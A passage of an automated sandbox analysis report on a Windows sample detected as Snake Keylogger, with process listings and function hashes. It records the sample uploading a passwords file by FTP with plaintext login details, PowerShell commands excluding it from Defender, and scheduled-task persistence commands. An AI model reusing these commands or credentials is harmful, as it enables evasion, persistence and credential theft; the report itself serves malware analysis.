10:15. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Nov 8, 2024 16:15:43.711635113 CET	49833	21	192.168.2.10	50.31.176.103	USER somac@gdmaduanas.com
Nov 8, 2024 16:15:43.856692076 CET	21	49833	50.31.176.103	192.168.2.10	331 User somac@gdmaduanas.com OK. Password required
Nov 8, 2024 16:15:43.860443115 CET	49833	21	192.168.2.10	50.31.176.103	PASS HW=f09RQ-BL1
Nov 8, 2024 16:15:44.136200905 CET	21	49833	50.31.176.103	192.168.2.10	230 OK. Current restricted directory is /
Nov 8, 2024 16:15:44.287009001 CET	21	49833	50.31.176.103	192.168.2.10	504 Unknown command
Nov 8, 2024 16:15:44.302723885 CET	49833	21	192.168.2.10	50.31.176.103	PWD
Nov 8, 2024 16:15:44.447961092 CET	21	49833	50.31.176.103	192.168.2.10	257 "/" is your current location
Nov 8, 2024 16:15:44.451539993 CET	49833	21	192.168.2.10	50.31.176.103	TYPE I
Nov 8, 2024 16:15:44.596482992 CET	21	49833	50.31.176.103	192.168.2.10	200 TYPE is now 8-bit binary
Nov 8, 2024 16:15:44.596683025 CET	49833	21	192.168.2.10	50.31.176.103	PASV
Nov 8, 2024 16:15:44.742249012 CET	21	49833	50.31.176.103	192.168.2.10	227 Entering Passive Mode (50,31,176,103,132,141)
Nov 8, 2024 16:15:44.748291969 CET	49833	21	192.168.2.10	50.31.176.103	STOR 971342 - Passwords ID - ZyiAEnXWZP448703948.txt
Nov 8, 2024 16:15:45.274976015 CET	21	49833	50.31.176.103	192.168.2.10	150 Accepted data connection
Nov 8, 2024 16:15:45.421041012 CET	21	49833	50.31.176.103	192.168.2.10	226-File successfully transferred 226-File successfully transferred226 0.146 seconds (measured here), 2.36 Kbytes per second

Target ID:	0
Start time:	10:15:19
Start date:	08/11/2024
Path:	C:\Users\user\Desktop\zam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\zam.exe"
Imagebase:	0x270000
File size:	728'576 bytes
MD5 hash:	6CCD423ABCF6BB68539F4C70419D6FC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:15:20
Start date:	08/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe"
Imagebase:	0xb90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:15:20
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:15:20
Start date:	08/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe"
Imagebase:	0xb90000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:15:21
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:15:21
Start date:	08/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp"
Imagebase:	0x40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:15:21
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:15:22
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x160000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:15:22
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x150000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:15:22
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x820000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3722282255.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3722282255.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	10:15:22
Start date:	08/11/2024
Path:	C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe
Imagebase:	0x7ff620390000
File size:	728'576 bytes
MD5 hash:	6CCD423ABCF6BB68539F4C70419D6FC3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:15:24
Start date:	08/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6616b0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:15:26
Start date:	08/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp"
Imagebase:	0x40000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:15:26
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:15:26
Start date:	08/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xdc0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3722196852.0000000003432000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3719586348.000000000041A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3722196852.000000000333B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	173
Total number of Limit Nodes:	13

Executed Functions

Function 069885A0 Relevance: 6.1, Strings: 4, Instructions: 1096COMMON

Download Yara Rule

Strings

(oq, xrefs: 06988C88
4'q, xrefs: 069885C4
4'q, xrefs: 06989283
4'q, xrefs: 069886CB

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: (oq$4'q$4'q$4'q
API String ID: 0-2528434116
Opcode ID: 5d072b1215f06fae2ea551413419aaccd814fe1f05d9c5d22dfdecc611fc763d
Instruction ID: 96f3d1d81de125bb6f795e323b14d560c8ffd0f07c21ae2384b9a68f5a2ff50a
Opcode Fuzzy Hash: 5d072b1215f06fae2ea551413419aaccd814fe1f05d9c5d22dfdecc611fc763d
Instruction Fuzzy Hash: 94A29C30A042099FDB54EFA8C984AAEBBF6FF88310F158569E405DB795D734ED41CBA0

Function 069858E0 Relevance: 5.3, Strings: 4, Instructions: 330
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 069859DA
,q, xrefs: 06985A52
,q, xrefs: 06985A60
(oq, xrefs: 069859E8

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: f31a35e0f16716fe6891b7b3bb1bfd4738f4287fc83addffa0bf5771738864f0
Instruction ID: c7c1fc8290a61f0c391241c9fd6c31d2f7b32d886f96bc2b2446c6f80359951a
Opcode Fuzzy Hash: f31a35e0f16716fe6891b7b3bb1bfd4738f4287fc83addffa0bf5771738864f0
Instruction Fuzzy Hash: 22D11770A00109DFDF94EFA9D884AADBBB6BF88311F668065E405EB6A1D731EC45CF50

Function 06985178 Relevance: 3.1, Strings: 2, Instructions: 560
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 0698556E
(oq, xrefs: 069856A2

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: 2c95fb7064318d327fd49ef245f3e778d3ebca6728164bfe38084bfc9b733095
Instruction ID: 286f6fccb0d43f0abda555ae2ff221c4a14109e62941e10cb5545cda834f3994
Opcode Fuzzy Hash: 2c95fb7064318d327fd49ef245f3e778d3ebca6728164bfe38084bfc9b733095
Instruction Fuzzy Hash: 37229B70A002189FDB94EF69C844BAEBBF6FF88310F258529E406DB295DB34DD45CB90

Function 06982106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON

Download Yara Rule

Strings

D, xrefs: 0698210B

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: f59f057fd23bf605b9f0444f386b4c000199a02d5102677a4bf2ef09cae257f8
Instruction ID: 2aa785262e5f1fdd0f6bfe5c16478f15485e3a0153ab9e98961b6295368786cb
Opcode Fuzzy Hash: f59f057fd23bf605b9f0444f386b4c000199a02d5102677a4bf2ef09cae257f8
Instruction Fuzzy Hash: 9A52FA74A012299FDB64DF24C898B9DB7B6FF89310F1041D9D54AA73A4CB34AE81CF91

Function 0698C0F8 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f614bb9b95efcaf4ee67e28ef7d39ba688ea78abb8ec7273235d20f7cd6d4b
Instruction ID: c764674c0bfb26692111bb6e96f8628b733d8b8ba08374f095bcaa67c6213ea5
Opcode Fuzzy Hash: 22f614bb9b95efcaf4ee67e28ef7d39ba688ea78abb8ec7273235d20f7cd6d4b
Instruction Fuzzy Hash: C3426C74E01229CFDB64DFA9C984B9DBBB2FB48315F1081A9E809A7355D734AE81CF50

Function 0698AA28 Relevance: .5, Instructions: 482COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c22e96460469c9dd6987791dc0cf9ad1609d1efa95d756344a60553f64fa0b4
Instruction ID: 5cc16b390fcfd64ee7c78bf2659c192abb1804011e295f1d2579a46e65a550e3
Opcode Fuzzy Hash: 8c22e96460469c9dd6987791dc0cf9ad1609d1efa95d756344a60553f64fa0b4
Instruction Fuzzy Hash: 0332D270D00219CFEB90DF69C580A8EFBB6BF88351F65C196D448AB616DB34D981CFA4

Function 06DADC50 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba98bc39005048b3914afb5f1d051585f3813b2f9029c87ac0dadaa05bb280e
Instruction ID: 8e3663cbfedc1f4411e2146f28f340a31b4c9ef05c5d97b1c3463b6fc9653f30
Opcode Fuzzy Hash: 3ba98bc39005048b3914afb5f1d051585f3813b2f9029c87ac0dadaa05bb280e
Instruction Fuzzy Hash: 96C17872B047048BDB99DBB6C860BAEB7E7AF88700F14446ED156CB690DB35E901CB91

Function 0698C0E8 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5d567ea6017ec4207d74acbe4842d89537cf47662c83ccea60fa800043af54
Instruction ID: 18da964f04a2d6da433c48bb08677d1b1e4befd343a0c9bc940fb9693f2cee94
Opcode Fuzzy Hash: cb5d567ea6017ec4207d74acbe4842d89537cf47662c83ccea60fa800043af54
Instruction Fuzzy Hash: 5861C375E01618CFEB18CFAAD984B9DBBB2FF88311F1481A9D809A7354D735A941CF60

Function 06DA95E0 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314032386.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da0000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2a5204e698a8b0ea0a0850be73580e079cd23b9d7e9792328f19cbc9e4bcc3
Instruction ID: 0eccee6ad9683a5eee380fe12c799967f6981e7dec6c8587568485fd6487b215
Opcode Fuzzy Hash: 3f2a5204e698a8b0ea0a0850be73580e079cd23b9d7e9792328f19cbc9e4bcc3
Instruction Fuzzy Hash: 86412674D1D308CFEB58CFA6C5686EDBBF9EF8D311F14A429C449AA245DB389841CE90

Function 0698AA18 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9b0790ae1514afd79349819f11578aa345eb6ade1465a8f30d06688b025eef
Instruction ID: 4a52ac1db7e2e261ce6f9ca3bb03e88f845f695c7334c8fd8dd48a86418267f4
Opcode Fuzzy Hash: 2e9b0790ae1514afd79349819f11578aa345eb6ade1465a8f30d06688b025eef
Instruction Fuzzy Hash: 3E41E671E006198FEB58DF6AC84179EBBB3FF88300F14C0AAD45DA6255EB345A85CF51

Function 06985EC8 Relevance: 10.4, Strings: 8, Instructions: 447
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 06985FDD
(oq, xrefs: 069863C7
,q, xrefs: 06986358
(oq, xrefs: 06985FB1
(oq, xrefs: 06985EF6
,q, xrefs: 06986368
(oq, xrefs: 0698607A
(oq, xrefs: 069863D7

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: 50aee5c4223226e2679b0df489937f3609577d360a0ccc62fed517f02fa6d357
Instruction ID: 7c7d74076358e9d564c3c6482e8143a99bd542a23f718e696ba1dec6b6435a7e
Opcode Fuzzy Hash: 50aee5c4223226e2679b0df489937f3609577d360a0ccc62fed517f02fa6d357
Instruction Fuzzy Hash: A0127A30A002098FDB94EF69D894AAEBBF6FF89314F248559E445DB7A1DB30ED41CB50

Function 06985EB9 Relevance: 5.3, Strings: 4, Instructions: 272
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 06985FDD
(oq, xrefs: 06985FB1
(oq, xrefs: 06985EF6
(oq, xrefs: 0698607A

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq
API String ID: 0-3853041632
Opcode ID: 5cec473ded114a97513cbf957110c3603f0ce0be3773e1ffa9768e2c917b1c23
Instruction ID: 4962685173f9a42992590ccad8eedc2582a34444be5afc0fa8b4c60dd11fa124
Opcode Fuzzy Hash: 5cec473ded114a97513cbf957110c3603f0ce0be3773e1ffa9768e2c917b1c23
Instruction Fuzzy Hash: 6BC16730A002099FCB94EF69C994AAEBBF6FF89304F658559E845EB761D730ED40CB50

Function 06989AF8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 0698A141
(oq, xrefs: 06989B31
(oq, xrefs: 06989B55

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq
API String ID: 0-3376450984
Opcode ID: 2fa858021a87859701fa3fbbb390680c0be0f717e8086b392fc2948a3ec7a7e8
Instruction ID: 1531443171fb6ffe214606c11eee194461e653f6714e3d682bdd91fa404eecd9
Opcode Fuzzy Hash: 2fa858021a87859701fa3fbbb390680c0be0f717e8086b392fc2948a3ec7a7e8
Instruction Fuzzy Hash: 43F11330A0020A9FCB55DF99C880DBEBBB6FF88300B15C555F959ABA91D734EC51DB90

Function 06984708 Relevance: 2.8, Strings: 2, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 06984826
Hq, xrefs: 069847F3

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: b200ae4f4aa0ad51d074c5d2e3b6711d89a4065b82da1c997b1dc75340b2e39c
Instruction ID: 8b71173c3567d60358e268bf6f69e76f64c2071a9cc2f7d2a71a27d8c44accbe
Opcode Fuzzy Hash: b200ae4f4aa0ad51d074c5d2e3b6711d89a4065b82da1c997b1dc75340b2e39c
Instruction Fuzzy Hash: E1B1D3307002169FEBA5AF28C844B2E3BEAFF89A25F144529E446CB794DB78CC41C791

Function 06987860 Relevance: 2.8, Strings: 2, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 0698789F
4'q, xrefs: 06987879

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 09dc40b1a542f5a63613c27a3b59af6fea2505aaf6bf8ddeaa79ddfd1af5b333
Instruction ID: fd34662b69f8b225dea3e35e10196abc9fe031b5ece737f44667fb4567f6990b
Opcode Fuzzy Hash: 09dc40b1a542f5a63613c27a3b59af6fea2505aaf6bf8ddeaa79ddfd1af5b333
Instruction Fuzzy Hash: 88B184307505018FEBA9BFA9C85473D37AAEF85651F38046AE502CF7B6DA29CC41C791

Function 06984C68 Relevance: 2.7, Strings: 2, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,q, xrefs: 06984D48
,q, xrefs: 06984D3E

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 8e2576336a9d8f7b345dbb8e72e1e7d252ae8100dbb2d421f48af08bd5000c88
Instruction ID: 8844740244eac65327a9241100155a703fe1f339522d39143c24547a791ba791
Opcode Fuzzy Hash: 8e2576336a9d8f7b345dbb8e72e1e7d252ae8100dbb2d421f48af08bd5000c88
Instruction Fuzzy Hash: 9981B231A005068FDB94EF69C884A6DB7F5FF89A00B25846AD406D7BA6D731EC41CB91

Function 0698B158 Relevance: 2.6, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 0698B1BC
Teq, xrefs: 0698B294

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: e133b181718ce879014d3b4a08e114e6d86417d4599c9408850f5746c4a935ed
Instruction ID: 219e964f4aec6275c3e504a278381505da167cc12ebcaeddbb7405f8c8a3ca29
Opcode Fuzzy Hash: e133b181718ce879014d3b4a08e114e6d86417d4599c9408850f5746c4a935ed
Instruction Fuzzy Hash: BD51C474E002189FDB48DFE9C884AAEFBB2FF88301F14812AE915AB364DB755905CF50

Function 0698B148 Relevance: 2.6, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 0698B1BC
Teq, xrefs: 0698B294

Memory Dump Source

Source File: 00000000.00000002.1313668032.0000000006980000.00000040.00000800.00020000.00000000.sdmp, Offset: 06980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6980000_zam.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: d965e5f3a8aee4bf616a3c7714f0d4f9db6b3d3edbe03217130a8e4dc74ad175
Instruction ID: 7b9e754f770fed4215e788658774ef307e7a3b22352e8c7d05ba3d2953cfcf9c
